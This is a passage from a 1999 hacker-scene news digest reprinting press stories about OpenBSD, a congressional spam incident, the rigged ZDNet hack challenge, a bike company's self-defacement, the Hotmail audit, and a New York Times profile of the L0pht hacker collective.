Bertrand, an engineer who contributes to OpenBSD, explains that it couldn't be shipped from the United States because of that country's stringent encryption export laws, which are designed to keep cryptographic tools out of the hands of criminals and terrorists. Canada has no such restrictions. The CD label reads: "Made in Canada -- Land of Free Cryptography." OpenBSD is earning respect for itself among security-conscious professionals at banks, research labs, government organizations, universities and other sites. Bob Beck, secure systems specialist at the University of Alberta, says it's used extensively on campus. "We don't have our OpenBSD machines broken into, and we like that," he says. "That's mainly due to people in the project going through and pro-actively auditing the code. "It seems most vendors -- Sun, HP, Microsoft and others who sell commercial operating systems -- get their product working and they ship it. The pressure is to get the product to market fast." Roy Brander, a research analyst for the City of Calgary's waterworks division, also admires OpenBSD. "It's a very solid, stable operating system that doesn't go down," he says. "I wouldn't accuse other operating systems of being insecure -- OpenBSD can be made insecure if you're careless and other operating systems can be made secure if you're extremely careful -- but there's no question that out of the box, OpenBSD is one of the most secure operating systems you can get." Though the server market is beginning to take notice, OpenBSD's user base is tiny compared even to Linux, which for all its fame accounts for a minuscule slice of the desktop operating system market -- less than five per cent. Brander estimates OpenBSD's installations in the tens of thousands. Consequently, it has a comparatively small body of applications that work on it and device drivers for hardware can be hard to come by. For that reason, it's unlikely to crack the desktop market. De Raadt has earned a reputation for not mincing words. He's openly critical of the process by which Linux has been developed. He's also unhappy with developers of commercial software vendors like Microsoft, Sun Microsystems and Hewlett-Packard, who, he says, take no responsibility for the numerous security holes in their products. "They don't care and there's no one to tell them they have to care," he says. But, he adds, "security is starting to become something that affects the bottom line" and slowly the industry is being forced to address security issues. While de Raadt has his critics, he is also respected for his talent and hard work. Those qualities would earn him big dollars in the corporate world and he says he gets an job offer every three days from venture capitalists. He doesn't take them. "I'd feel guilty," he says. "I can actually provide something to the community that they'll use. If I were to work for Sun Microsystems, this wouldn't matter to their bottom line and I don't think it would see the light of day. I wouldn't actually be securing people's systems." Beck adds that even if de Raadt wanted to make it commercial, his fellow programmers would abandon him. "Going commercial would probably kill it, in my opinion. There would be much more of a pressure to get it to market quickly, rather than getting it to market correctly." Fortunately for OpenBSD, de Raadt says the money can wait. "If I had a lot of money, what would I do? I'd do this." @HWA 36.0 SPAM HOUSE ~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by BHZ, Tuesday 5th October 1999 on 1:07 pm CET "IF YOU'RE LOOKING TO LOSE WEIGHT PERMANENTLY AND YOU DON'T HAVE TIME TO SEEE AN EXPERT HERE'S THE PERFECT OPPORTUNITY. MY FRIEND LOSS 40 LBS. READ THIS! [sic]" - spam hit thousands of House of Representatives addresses. To make it all funnier recipients hit the reply all button, so very fast mail servers were down:) Wired. The House of Spam on the Hill by Declan McCullagh 3:00 a.m. 5.Oct.99.PDT The spam began typically enough, with a mass email touting quick weight loss pills. But by last Friday, the trouble that started with a message sent by one Hill staffer to thousands of House of Representatives addresses had mushroomed, clogging inboxes, drawing angry accusations, and prompting mass email replies by anti-spam advocates that made the problem even worse. Read About ISPs and Spam "IF YOU'RE LOOKING TO LOSE WEIGHT PERMANENTLY AND YOU DON'T HAVE TIME TO SEEE AN EXPERT HERE'S THE PERFECT OPPORTUNITY. MY FRIEND LOSS 40 LBS. READ THIS! [sic]" wrote Cher Castillo, an aide to Rep. Alcee Hastings (D-FL), in the original message. But many recipients directed their complaints to all the other recipients when they hit Reply All. This further jammed the already-taxed House mail servers, creating widespread annoyance, and preventing some House offices from receiving any email at all. One response that was particularly ill-received came from Steve Maviglio, chief of staff for Rep. Rush Holt (D-NJ), who -- perhaps inadvertently -- replied to everyone, lecturing them on the evils of spam and requesting that they support his boss' anti-spam legislation. "When I first got it [the spam], I immediately reported it to House Information Resources," he said. Then Maviglio wrote, "How would you like to receive thousands of these each day??? Our constituents do -- costing them money and invading their privacy. Stop Spam!!!!" And then? "I hit Reply All," he said. Maviglio said that Microsoft Exchange showed only a few dozen recipients. Ooops. Some of the recipients -- there are about 20,000 Hill email addresses, though not all were copied -- thought that Maviglio had orchestrated the original diet pill spam to promote the so-called Can Spam Act that his office is co-sponsoring. He denies it. "All I know is that my name showed up as the first one in many emails so people thought we did it. We're creative but not that creative. Besides, it's against House rules," he said. A sampling of the hundreds of replies he received: "Undeliverable mail." "I hate you." "Take me off your list." "Die." Some irked Hill staffers who saw their inboxes swell last Friday with "get-me-off-this-list" replies say that a new law isn't the answer. "People are trying to blame other people to solve problems they caused themselves," said one aide, who asked not to be identified. "They should be disciplined." Some Congressmen joined the fray, writing that Castillo had violated House rules, and other recipients warned that the diet pills suggested in the original message should not be used to lose weight. Ironically, if the Can Spam Act had become law -- currently no hearings are scheduled -- Maviglio could be liable for a US$25,000 fine, or "the actual monetary loss suffered by the provider as a result of the violation," whichever is larger. And what about Cher Castillo, the original spammer? Her office refused to comment and she did not respond to interview requests. One staffer who complained to Hasting's office last week about Castillo said at first they didn't take the spam seriously. "But by today they weren't laughing," the staffer said. @HWA 37.0 NET-SECURITY SITE INFO ~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by BHZ, Tuesday 5th October 1999 on 1:01 pm CET Since yesterday we on net-sec host two security sites. InterScape Security (http://interscape.net-security.org) and 403 forbiden (http://forbidden.net-security.org). Do check the both of them. Also Packet Storm Security mirrors Default newsletter on http://packetstorm.securify.com/mag/default @HWA 38.0 PCWEEKS' HACKER CHALLENGE "RIGGED" FOR NT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Tuesday 5th October 1999 on 5:30 am CET There has been quite a lot of discussion on the usefullness of so-called "hack-the-box" contests. Well, ZDNet shows us how not to do it. Today, ZDNet Labs revealed that they deliberately neglected to apply some 21 different recent security patches to the Linux system which participated in the PCWeek hacker challenge, including one used by the cracker to gain access to the Linux server. ZDNet's response to the charges of the unfairness of omitting the 21 security patches was that enterprise businesses would not want to apply 21 individual fixes and that most large companies would prefer the one large, sweeping-in-scope, fix. This objection didn't prevent ZDNet Labs from hypocritically applying Microsoft's latest huge service release for Windows NT in time for the test though. Linux Today http://linuxtoday.com/stories/10767.html ZDNet Admits Mistakes in Recent Security Test Oct 4, 1999, 23:19 UTC (89 Talkbacks) (Other stories by Arne W. Flones) [ The opinions expressed by authors on Linux Today are their own. They speak only for themselves and not for Linux Today. ] By Arne W. Flones Regarding the recent Hacker Shootout, ZDNet Labs today admitted that they deliberately ignored an embarrassing 21 security upgrades to one of the two systems under test. (See PC Week: CGI script opens door) In this alleged test of security, ZDNet Labs invited "hackers" [sic] to try to break into two different computers, one running Windows NT and one running the Red Hat distribution of Linux. This came on the heals of August's similar battle between Windows NT and an Apple-based Linux distribution which drew a lot of publicity. Under criticism from the Linux community for the lack of objectivity in the test, ZDNet's director, John Taschek responded, [The test] was designed and put together by PC Week for the purpose of testing security implementation. We don't care which operating system (if any) is broken into first. We want to establish the basis for a story on the best practices for implementing security. And later he said, We don't care who wins or loses--in fact we're not looking to report a winner or loser. Just on implementations. In spite of continued protests, the test proceeded and on September 24 the Linux site was cracked using a combination of a weakness in Web programming and a security hole in a program called crond, part of every Linux installation. When the method used by the cracker was revealed, it was immediately apparent that both of the security holes could have easily been closed. The first hole, within a type of World Wide Web program called a CGI script, could have been avoided by paying closer attention to security when writing the script. This hole had nothing to do with Linux, but was in a separate application. The second hole had been publicly revealed in August by Red Hat, the distributor of the Linux system under test. Although ZDNet labs might have inadvertently slipped up on the first hole, they would have certainly known about the second. The cracker used both holes to crack into the system. Today, ZDNet Labs revealed that they deliberately neglected to apply some 21 different recent security patches to the Linux system, including one used by the cracker to gain access to the Linux server. It is this admission that has raised the hackles of knowledgeable computer users, security experts and the Linux community. As the source instructions which make up Linux are freely available to anybody who wants them, there are no reasons to wait to make security changes available to the public. So this number of security patches are common in the Linux world. As soon as a security hole is found, it is quickly patched and the fix is immediately posted to the public forums on the Net. The ability to look at all the source instructions enables anybody to verify the correctness of the patch. Typically, a program to exercise the exploitation is available as well. This dramatically reduces the risk in applying these patches. The scope of the changes is very narrow and is very easily tested in isolation. Therefore, with a small effort, and in a very short time, an IT manager can know the impact the patch will have on her all important systems. The result is that the patch can be applied quickly and with the assurance that nothing will break but the cracker's ability to compromise the company's data. This is very unlike the Windows NT world, where Microsoft keeps all the source instructions secret. Microsoft Windows, by nature of its proprietary design, must withhold security information and release the fixes all at once in a larger, less frequent, service release. The policy of security through obscurity is arguable. But the impact of fixing security holes with an infrequent and all encompassing software upgrade is not. It can make testing a nightmare because individual fixes are not testable in exclusion of other changes. And, since Microsoft lumps the many security fixes with other, general improvements, adding a Microsoft service release enterprise-wide is a very, very risky affair. One never knows what will break. Therefore, the rules of the game are very different for Windows than they are for Linux. ZDNet Labs conveniently ignores this fact. ZDNet's response to the charges of the unfairness of omitting the 21 security patches was that enterprise businesses would not want to apply 21 individual fixes and that most large companies would prefer the one large, sweeping-in-scope, fix. ZDNet provides no basis for this absurd claim. Their claim goes against common practice in the industry and it is against common sense. It is only in the Microsoft world where an untestable, monolithic software release is preferable to a few much smaller, and manageable, perturbances. Nota bene: ZDNet's objection to the the 21 easily audited and tiny patches didn't prevent ZDNet Labs from hypocritically applying Microsoft's latest huge service release for Windows NT in time for the test. ZDNet's claims are unsupportable. Not only was ZDNet Labs responsible for allowing the installation of a flubbed CGI script which allowed the cracker to peek into the Linux system, they were negligent in ignoring 21 known security holes. Their admission today that they deliberately chose not to apply these patches has tainted their test. They knew that every cracker would look first at these 21 cricks in Linux's armor. No wonder it only took a few days for the Linux system to be cracked. ZDNet's incompetence assured it. This comes as close to professional malfeasance as I have ever seen. With today's knowledge it is impossible for ZDNet to claim even vestigial objectivity. With what we now know of this affair, to continue the charade would be an injustice. @HWA 39.0 DUTCH "CYBERCOPS" PATROLLING THE NET ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Tuesday 5th October 1999 on 5:00 am CET Dutch police opened their fight against Internet crime Monday by naming 15 "cybercops" to target on-line offenses ranging from pedophilia to credit-card fraud. The team will patrol the country's Internet sites in search of on-line crime, using new computer surveillance equipment and old-fashioned police techniques. The Internet officers will be able to tap phone lines and, with a court order, will be allowed to crack into computer systems to find incriminating evidence - the virtual equivalent of a search warrant. Read more http://www.techserver.com/noframes/story/0,2294,500041373-500067208-500122112-0,00.html Dutch 'cybercops' to patrol information highway Copyright © 1999 Nando Media Copyright © 1999 Associated Press From Time to Time: Nando's in-depth look at the 20th century AMSTERDAM, Netherlands (October 4, 1999 3:46 p.m. EDT http://www.nandotimes.com) - Dutch police opened their fight against Internet crime Monday by naming 15 "cybercops" to target on-line offenses ranging from pedophilia to credit-card fraud. The team will patrol the country's Internet sites in search of on-line crime, using new computer surveillance equipment and old-fashioned police techniques. "They will go after all crime committed on the Internet and that could range from child pornography to credit card fraud, or the sale of illegal medicine and software," police spokesman Albert Folgerts said. The Internet officers will be able to tap phone lines and, with a court order, will be allowed to crack into computer systems to find incriminating evidence - the virtual equivalent of a search warrant. @HWA 40.0 BIKE WEB SITE HACKS ITSELF ~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Tuesday 5th October 1999 on 4:10 am CET Hack back. That's what Hoffman Bikes decided to do after its Web site was defaced for the fourth time by the same hacker group in the past two weeks. "Good riders, bad nerds," the group called "r 1 3 9" wrote, mockingly. Marketing director Bryan Baxter finally responded by posting text and images that spoofed the company's image and security at its regular address, www.hoffmanbikes.com himself. Lol! http://cnn.com/TECH/computing/9910/04/hacker.week/index.html Bike Web site hacks itself after four attacks By Robin Lloyd CNN Interactive Senior Writer October 4, 1999 Web posted at: 4:47 p.m. EDT (2047 GMT) In this story: 'Learning as we go' Smaller businesses at lower risk Web site tallies hacks No contact with hackers (CNN) -- Hack back. That's what Hoffman Bikes decided to do after its Web site was defaced for the fourth time by the same hacker group in the past two weeks. "Good riders, bad nerds," the group called "r 1 3 9" wrote, mockingly. Marketing director Bryan Baxter finally responded by posting text and images that spoofed the company's image and security at its regular address, www.hoffmanbikes.com. "If they wanted to make us look stupid, we decided to help them out," he said. The site for the Oklahoma-based bike manufacturer was just one of some two dozen to be defaced for hackers in the past 10 days, according to attrition.org, a site that logs and mirrors Web defacements. But it was the only one to respond with humor. "We decided that if they were gonna get in that we would help them out," Baxter said. He crafted the site as an online catalog, not for e-commerce, so security was not a priority. "It's become a little soap opera," he said. "We just decided not to be too uptight about it. They could've done stuff that was a lot worse. They could've put porn up on it or something." Baxter put up the counter-hack himself, featuring a less-than-flattering picture of Matt Gipson, one of Hoffman's sponsored riders, with a pointer from his head to the words "duh, huh?" The counter-site also offered links to Hoffman's real site and the previous hacks to the site, as well as to lists for site visitors in case they wanted to join r 1 3 9 or get work at Hoffman or give it Internet security advice. That drew about 100 responses and dozens of phone calls. 'Learning as we go' Baxter admitted that the rider-owned company is not "super good" yet at operating its Web site. "We're learning as we go," he said. Hoffman pays for its server time in kind from a friend in Texas. "We tried to change some things," after the first hack, he said. "We tried four times with different server settings and they were still getting in." So he gave up, in effect. If the site's security is breached again, Hoffman will just take its site down before trying again, he said. Patrice Rapalus, director of Computer Security Institute in San Francisco, said beefed up security, patching holes and reports to the authorities are recommended responses to hackers, not humor. Defacement, the equivalent of graffiti on a bricks and mortar business, is the least of a firm's computer security concerns, she said. That kind of hack is impossible to hide from consumers. Many companies prefer to cover up the more serious hack -- intrusions into computer networks, she said. Companies hate to admit one likely scenario -- they are unaware that their security has been breached, Rapalus said. The number of companies reporting security breaches in the past three years rose from 17 percent to 32 percent, she said. And that's just the companies willing to own up to intrusions of which they are aware. Security breaches, even Web site defacements, mar a firm's image and can damage its electronic business. "It would undermine any kind of trust someone would have in your organization and the ability of your organization to safeguard confidential information or credit card information," she said. Brian Martin, of attrition.org, said that Hoffman's response to being hacked multiply was humorous but irresponsible. "It undermines the idea of secure Web sites and gives their customers the impression that the (site) administrator simply does not care about security that much," Martin said. Smaller businesses at lower risk Sites for government agencies and banks are far more attractive to hackers with criminal intent, Rapalus said. "Like anything else, it's follow the money," she said. CSI, a membership association, is comprised mainly of Fortune 500 firms and government agencies. A list of sites hacked in the past 10 days, as reported by attrition.org, also illustrates that point. They included DeltaNet, PanAmSat, a Le Monde publicity site, Altamira International Bank, Mount Gay Rum site, DC ArtBeat, Seoul National University, Web Yes Singapore and a State of Utah learning resources site. Smaller businesses, like larger ones, need to worry about online security as they launch Internet sites, Rapalus said, but they generally are not the focus of the most malicious hackers. She recommended a cooperative effort between law enforcement and industry to crack down on the big offenders. Web site tallies hacks Attrition.org has collected statistics on targets of hacking since it went online in 1995. By its count, there have been 79 hacks to general government systems, 27 to NASA, 19 to Army systems, 47 to other military systems, 103 to educational institutions and 1,042 to commercial systems. Groups called Antichrist and Forpaxe lead the pack, with 148 and 140 hacks credited to them by attrition.org. Global Hell, at least one of whose members recently was been arrested as a result of FBI raids, gets credited with 118 hacks. More than 40 other groups are credited with anywhere from two to 50 hacks. Some hackers evidently see a credit on attrition.org as a badge of honor, with a group called TREATY's hack against IDG Co. claiming in the text of its defacement that it was "just doing it" to get mentioned on attrition.org. No contact with hackers Unlike many hacks, the r 1 3 9 defacements posted no e-mail contact for the group. Hackers are notorious for signing their work and offering a valid, but anonymous, mailbox. But Baxter, of Hoffman Bikes, said he suspected some of the e-mail the company received in response to its counter-hack were from r 1 3 9 members. Those correspondents said they would trade security advice for Matt Gipson autographs, the Hoffman sponsored rider. "We offered it to them, but we haven't gotten a response back yet," he said. Hoffman has decided against pressing charges or other legal action against the hackers even if they did come forward, Baxter said. "It appears we've turned it into a good thing, at least something entertaining. But it can be a very, very bad thing. I wish it wasn't possible to do." @HWA 41.0 ARMY STUDYING IT RECRUITMENT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Tuesday 5th October 1999 on 3:50 am CET The Army has kicked off a yearlong study to help determine how to better recruit and maintain its information technology work force, with an emphasis on how the service can use financial inducements to attract workers. The charter of the Army Information Technology/Information Assurance Workforce Issues Study placed compensation first in the list of issues and challenges the Army must address to attract and retain IT personnel in a technology-driven economy. The study also will look at non-monetary inducements. Read more http://www.fcw.com/pubs/fcw/1999/1004/web-itsurvey-10-04-99.html OCTOBER 4, 1999 . . . 14:56 EDT Army studying IT recruitment BY BOB BREWIN (antenna@fcw.com) The Army has kicked off a yearlong study to help determine how to better recruit and maintain its information technology work force, with an emphasis on how the service can use financial inducements to attract workers. The charter of the Army Information Technology/Information Assurance Workforce Issues Study placed compensation first in the list of issues and challenges the Army must address to attract and retain IT personnel in a technology-driven economy. The study also will look at non-monetary inducements. Lt. Gen. Larry Ellis, Army deputy chief of staff for operations and plans, said the study will help the Army produce policy and resource recommendations to enhance IT recruitment, retention, education and training. In addition, the Army will use the study to develop a table of organization for its Force XXI digitized battleforce by next August. Gen. John Keane, Army vice chief of staff, described IT and information systems as the "dominant" issues the Army needs to keep in mind as it develops and fields the digitized battle force. The soldiers and civilian Army employees who operate those Force XXI systems "will always remain the linchpin to ensure success in information dominance and to counter the continued threats and security issues for our information networks,'' Keane said in a Sept. 22 memo. Keane asked the help of all Army IT professionals in developing these new IT personnel policies and procedures by filling out an online survey (www.itiasurvey.army.pentagon.mil) no later than Nov. 20. @HWA 42.0 TRUSTE OK'S HOTMAIL FIXES ~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Tuesday 5th October 1999 on 3:30 am CET Microsoft has fixed a security hole that threatened the privacy of its 40 million Hotmail users in August, according to the results of an outside audit released today. Microsoft in August voluntarily agreed to the audit at the request of the Web privacy seal program Truste. Until today, however, there had been doubts about whether any results of the audit would be made public. News.com http://news.cnet.com/news/0-1005-200-807131.html?tag=st.ne.1002.tgif?st.ne.fd.gif.e Truste OKs Hotmail security fixes By Courtney Macavinta Staff Writer, CNET News.com October 4, 1999, 4:40 p.m. PT Microsoft has fixed a security hole that threatened the privacy of its 40 million Hotmail users in August, according to the results of an outside audit released today. The announcement disclosed only that a "Big Five" accounting firm reviewed the "nature, extent, and cause of the problem," as well as the solutions that Microsoft put in place. As part of the audit, Microsoft employees who fixed the hole were interviewed, and the unnamed firm tested the solution to make sure the problem wouldn't reoccur. As previously reported, the review of Hotmail was commissioned after the service was pulled offline for two hours when it was discovered that accounts could be accessed without passwords as long as a user's name--which is commonly found in a Hotmail address--was known. Microsoft said it fixed the problem the same day and has since admitted that the hole was the result of a string of code that hadn't been tested for security. Microsoft in August voluntarily agreed to the audit at the request of the Web privacy seal program Truste, which Microsoft generously sponsors. Until today, however, there had been doubts about whether any results of the audit would be made public. "Both Microsoft and Truste have confirmed that we've effectively resolved that incident, and that we are in compliance with Truste's licensing agreement," Richard Purcell, data practices director at Microsoft, said today. "The firm had technical experts, and they were careful about reviewing the solutions we put in place at the code level," he added. Truste monitors participating sites' privacy practices and ensures that licensees "help protect the security" of the information they collect and store. Watchdogs skeptical Based on guidelines set by the American Institute of Certified Public Accountants (AICPA), which oversees the conduct of major firms, Microsoft and others participating in the audit were restricted from releasing the accounting firm's full report. But consumer advocacy group Junkbusters had called for full disclosure of the report, insisting that if the results weren't made public, Hotmail users would have no assurance that their accounts are safeguarded. Despite the announcement that Hotmail is secure, Jason Catlett, founder of Junkbusters, was not satisfied with the level of detail in the companies' announcement. "All Microsoft and Truste are saying is that someone went in with a notebook and pen and asked questions, but the company is not revealing the name of the auditor or the instructions to the auditor--the summary is vague," Catlett said. "They had the chance to commission an audit that could have been open." Specifically, Microsoft had commissioned an "Agreed-Upon Procedures Engagement," in which the parameters of the review are set by the certified public account, the client, and usually a specified third party, in this case Truste. The results of this type of report can only be made available to those parties, according to the AICPA. The online industry and the Clinton administration have endorsed so-called privacy seal programs as a way to safeguard anonymity. But as more Net users provide valuable personal information in exchange for goods and custom Web content, privacy advocates say better laws are needed to shield privacy, because industry guidelines don't come with strong enough enforcement. Truste says its voluntary efforts are effective. "From our point of view this does demonstrate that the resolution process we have in place works," said Bob Lewin, executive director of Truste. But for Microsoft, the review only puts to rest concern over the August 20 Hotmail security hole. The company has since been investigating programs that people could use to generate false passwords to crack open Hotmail accounts. "We can't prevent malicious hackers from targeting these platforms," Purcell added. "But it's important to say that we really have a strong sense of responsibility about protecting the security of customers' information." @HWA 43.0 SECURE DSL TECHNOLOGY ~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Monday 4th October 1999 on 1:20 am CET Nortel Networks has taken the wraps off a network-based secure digital subscriber line (DSL) technology. The idea behind the technology, known as Secure DSL, is that it stops any electronic incursions or eavesdropping on the "always-on" DSL connections that many businesses and serious home users of the Internet are now starting to use. The system works by securing each DSL line with network-based, packet firewalls, so precluding outside attacks. Full story http://www.currents.net/newstoday/99/10/03/news5.html Daily News Secure DSL Technology By Sylvia Dennis, Newsbytes. October 03, 1999 Nortel Networks [NYSE:NT] has taken the wraps off a network-based secure digital subscriber line (DSL) technology. The idea behind the technology, known as Secure DSL, is that it stops any electronic incursions or eavesdropping on the "always-on" DSL connections that many businesses and serious home users of the Internet are now starting to use. The system works by securing each DSL line with network-based, packet firewalls, so precluding outside attacks. Nortel says that Secure DSL is one element of a suite of new capabilities announced today by Nortel Networks to enable mass market DSL and will be offered as a new feature on the Shasta Subscriber Service System (SSS). The SSS consists of a Shasta 5000 Broadband Service Node (BSN) with the IP (Internet Protocol) Service Operating System (iSOS) and Service Creation System (SCS). The BSN was developed by Shasta Networks, a company that Nortel acquired in March. Nortel says that the Shasta 5000 is currently deployed with several service providers around the world which are preparing for the transition to mass market deployment of DSL and other broadband access technologies. Initially, ten DSL service providers are offering the Secure DSL service to their subscribers: Cayman Systems, CopperCom, Efficient Networks, FlowPoint, Jetstream Communications, Netopia, Network TeleSystems, Promatory Communications, TollBridge Technologies, and Wind River Systems. Anthony Alles, Nortel's general manager, said that, because DSL lines are typically always connected to the Internet, unlike the intermittent, dynamic connections of dialup networks, computers attached to DSL lines are exposed to Internet security attacks. As DSL becomes more widely deployed, he said, increasing numbers of DSL subscribers have reported attacks on their computers, sometimes leading to copying or destruction of sensitive data. "It's critically important for the rapid adoption of DSL that the DSL industry find an easy, cost-effective solution for securing always-on DSL lines," he said. Alles said that DSL is a mass market technology, and will be widely deployed to residential and small business customers, most of whom lack the technical skills and resources to deploy and maintain their own security systems. "Security is an expectation, not a feature, for the mass market, and DSL service providers which do not provide such integral security capabilities may find themselves at a severe competitive disadvantage," he said. Pricing on the Shasta 5000 BSN starts at $30,000 for ISPs and other interested carriers. Further details of the technology can be found on the Web at http://www.nortelnetworks.com/shasta . @HWA 44.0 HACK, COUNTERHACK ~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Monday 4th October 1999 on 12:40 am CET Here's another article on those "eight computer hackers in a dingy warehouse" called the L0pht. A bit of history and methodology of the group a long with some interviewing quite a good read. Read it http://www.nytimes.com/library/magazine/home/19991003mag-hackers.html HacK, CouNterHaCk The members of L0pht can knock you off line, steal your credit-card numbers and cut off the power for your whole neighborhood. But they'd like you to think they're the good guys. By BRUCE GOTTLIEB Photographs by DANA SMITH Would you like to see how to knock someone off the Web?" Silicosis asks. Sili, as he is known, is a slim young man with serious eyes set deeply into a delicate face. He's the newest member of a hacker collective known as L0pht (pronounced "loft"). He becomes visibly uncomfortable when asked to talk about himself. He gives his age as "mid-20's" and then clams up. But when the conversation moves to hacking, Sili turns voluble: "I think it's a thrill to look at a program and figure out how to make that program do something that it was never designed to do in the first place. There's the challenge." We sit down at a computer monitor while Sili explains his latest discovery. By mimicking messages that typically flow between computers on a network, he can reach out to almost anyone running Windows 95, 98 or 2000 in a large corporate environment, or anyone using a cable modem, and forcibly disconnect them from the Web. In a demonstration of this, he types a one-line command on his computer and hits the return key with a flourish. Sure enough, the computer across the room, which seconds before had been connected to M.I.T.'s server, is now off line. The same technique, Sili explains, can be used to take information flowing between the Web and your neighbor's computer and reroute it into your own. A clever hacker could capture a neighbor's banking transactions, passwords or credit-card information. Sili published his research on L0pht's Web site in mid-August. The report was covered in the computer publication Infoworld and the on-line magazine ZDNet. At the time, a Microsoft spokesman, instead of denouncing L0pht, expressed the hope to reporters that the group would "design a more secure version of the protocol" -- a hackerproof set of operating instructions for the computer. This request strikes Sili as especially outrageous. "Why doesn't Ralph Nader just redesign the Corvair?" he asks. Nader is something of a role model at L0pht, a confederation of eight young hackers who position themselves, incredibly enough, as a consumer-advocacy group. But L0pht's tactics are a bit unorthodox: breaking into software systems and then posting instructions on how to do so on the Web, where they can be picked up by software designers and malicious hackers alike. Intrigued, I paid a visit to their workshop. L0pht's "laboratory" is the second floor of a ramshackle warehouse in suburban Boston. Predictably, the door to the lab has a sign for the pizza man -- "Domino's Knock Loudly." The eight men who make up L0pht allow themselves to be identified only by their screen names: Dr. Mudge, Space Rogue, Dildog, Brian Oblivion, Kingpin, Silicosis, Weld Pond and John Tan. They look to be in their 20's or 30's, but their six-room suite is an adolescent geek's fantasy clubhouse. One wall is papered with antiquated circuit boards while another has a signed picture from Julie, Penthouse Pet. Junk food in the cupboard is taken seriously. There are three different kinds of Cheez-Its: hot and spicy, plain and white cheddar. The warehouse brims with more than 200 computers ranging from state-of-the-art Sun and Digital workstations to nostalgia pieces like Commodore 64's and Apple IIe's. Black cables, yellow cables and jumbles of thin rainbow-colored wires drip from the ceiling, all jacked in to steel racks of oscilloscopes, radio transmitters, D.S.L. modems, I.S.D.N. modems, half-opened C.P.U.'s and a 50-foot roof antenna. The warehouse also contains several small-scale dummy computer networks. L0pht's "research" consists of trying to break into these internal systems. Upon discovering a security flaw in commercial-network software, the L0phties publish an advisory on their Web site. The advisory is a double-edged sword: a detailed description of the flaw — enough information for other hackers to duplicate the "exploit" — and a solution that tells network administrators how to close the loophole. L0pht's unorthodox methods have garnered praise from very unlikely quarters. Sixteen months ago, L0pht appeared before the Committee on Governmental Affairs of the United States Senate. Senator Fred Thompson introduced L0pht not as a "gang" nor even a "group," but, translating for Washington pols, as a "hacker think tank." L0pht wowed the committee by reeling off an alarming list of security holes in public and private systems. After the presentation, Senator Lieberman gushed, "It is probably not what you came to hear, but actually, I think you are performing an act of very good citizenship and I appreciate it." Lieberman went on to compare L0pht, in a single sentence, to both Rachel Carson and Paul Revere. "You are performing a valuable service to your country," Thompson added, "and we appreciate that and want you to continue." The National Security Council is equally bullish on L0pht. I met the N.S.C.'s director of information protection, Jeffrey Hunker, at Defcon, an annual three-day "conference" attracting more than 2,000 computer hackers from around the country. Hunker had come to talk about President Clinton's initiatives on computer security (and to spy on hackers, if you believe the whispers). He surprised me by raving about the group's technical sophistication. "L0pht has carved out an interest-ing niche for itself," he added, "and for similar-minded people — white-hatted hackers. Their objective is basically to help improve the state of the art in security and to be a gadfly, so to speak — to identify products that have vulnerabilities and make certain those vulnerabilities get fixed." When I told L0pht about Hunker's comments, they rolled their eyes, saying, "You're not going to publish that, are you?" For one thing, they had no wish to be identified as favorites of the N.S.C., since that might jeopardize their standing among so-called black-hat, or malicious, hackers. "We are all extremely ethical and moral," one member allowed, "but we're not white-hat hackers. We have our own moral and ethical standards" — the term is gray-hat. It's not hard to spot the reasons for the moral ambiguity. In their off hours, Mudge and Dildog are members of Cult of the Dead Cow, a black-hat hacker group that recently released Back Orifice 2000 (bo2k), a computer program that enables a hacker to control another computer from afar. (The name is a crude play on Microsoft's Back Office Server, a program that allows a legitimate administrator to, among other things, control another computer on a network.) But unlike Back Office, bo2k is "invisible," meaning that a hacker can spy on another user, even change files, without the user's knowledge. Dildog, one of bo2k's authors, euphemistically describes it as "a shy program." Jason Garms, the former head of Microsoft's security-response team, is a bit more direct, labeling b02k "a malicious program, with malicious intent." Perhaps because of their ties to the black-hat community, L0pht members refuse to be identified, although they will let themselves be photographed. As Space Rogue explains (and any hacker knows), pictures are next to useless if you're trying to dig up private data on someone. When L0pht testified before the Senate, members would not accept checks for hotel and travel expenses. As with members of the Witness Protection Program who have come before the Senate, they were reimbursed with cash. Senator John Glenn even signed pictures — with the group's screen names: "To Dr. Mudge. . . . To Space Rogue. . . . To Weld Pond." Open up the raincoat to expose all the little parts," is how Mudge, smiling, describes L0pht's ethos. Mudge will not disclose his age, but mid-30's seems a good guess. He claims a college degree in music with further course work in computer science. Mudge says that early experimenting with computers led to informal warnings from certain "three-letter agencies." He wears his hair below his shoulders, sports a goatee and favors faded jeans and a T-shirt. In his Senate testimony he claimed to have given training seminars at NASA and the National Security Agency. Mudge frankly admits that he'll answer anyone's technical questions about hacking. "If a black hat approaches us and says, Hey, this is the project or problem I'm looking at . . . we'll talk to them, no problem. And if a government agency approaches us and says, How do you do this, or, How does this work, we'll talk to them." Of course, this laissez-faire attitude has its costs. Mudge says: "Full disclosure is something we had to grapple with for a long time. The flip side is that critics say, 'You're giving people tools that can actually do bad things.' That is absolutely true. It's got a lot of nasty side effects." For instance: last December, a hacker magazine called Phrack disclosed a flaw in a network program called Cold Fusion. (Network programs help manage computers that are linked together). In April of this year, Weld Pond — an older, thoughtful L0pht programmer — discovered a second, more serious way to exploit the flaw. Weld immediately published an advisory on L0pht.com prescribing a fix. Weld's report also contained enough detail to explain the flaw to so-called "script kiddies" — young, malicious hackers with limited technical expertise who are among the most avid readers of L0pht's advisories. In the span of three weeks, according to PC Week, hackers inserted bogus text and images on at least 100 Cold Fusion systems, including those of NASA, the Army and the National Oceanic and Atmospheric Administration. So why didn't L0pht contact Allaire, the small Cambridge, Mass., software firm that makes Cold Fusion, before releasing an advisory? The reason, say Weld and the other L0phties, is that vendors usually sweep tips from hackers under the rug. Vendors, claims L0pht, don't want customers to think software has flaws. "We were trained by the vendors to go public," says Mudge, "to give them a black eye." With an attitude like this, it's tempting to blame Weld Pond, especially since L0pht's advisory led to more security breaches than would have 